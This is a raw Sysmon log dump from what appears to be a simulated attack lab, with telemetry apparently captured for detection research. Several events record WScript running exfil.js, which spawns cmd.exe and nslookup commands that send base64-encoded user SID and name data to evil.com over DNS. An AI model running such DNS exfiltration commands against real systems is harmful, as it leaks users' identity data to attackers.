14:21:26.470{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.470{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.469{2E1864BB-18E0-629A-6742-000000005F02}39765552C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-DF42-000000005F02}6980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.469{2E1864BB-18E6-629A-DF42-000000005F02}6980C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlamdx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.466{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllwzk.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.419{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.419{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.419{2E1864BB-18E6-629A-DD42-000000005F02}80086760C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-DE42-000000005F02}7532C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.419{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.419{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-DE42-000000005F02}7532C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.419{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.419{2E1864BB-18E6-629A-DC42-000000005F02}73841772C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-DE42-000000005F02}7532C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.429{2E1864BB-18E6-629A-DE42-000000005F02}7532C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-DC42-000000005F02}7384C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllwzk.tmp 2>&1 10341000x8000000000000000207028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.404{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-DD42-000000005F02}8008C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.404{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-DD42-000000005F02}8008C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.388{2E1864BB-18E6-629A-DD42-000000005F02}80086760C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-DC42-000000005F02}7384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000207025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.388{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5015711FD2C3A13886413758B2A75F4E,SHA256=50B34EE8F24BAB0E01BC445D1E13570A7B27AAAB91F94148F132352FE8C504DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.388{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-DD42-000000005F02}8008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.372{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.372{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.372{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.372{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.372{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-DC42-000000005F02}7384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.372{2E1864BB-18E0-629A-6742-000000005F02}39767540C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-DC42-000000005F02}7384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.384{2E1864BB-18E6-629A-DC42-000000005F02}7384C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllwzk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.372{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlznud.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.350{2E1864BB-18E6-629A-DA42-000000005F02}63724860C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-DB42-000000005F02}896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.350{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.350{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.350{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 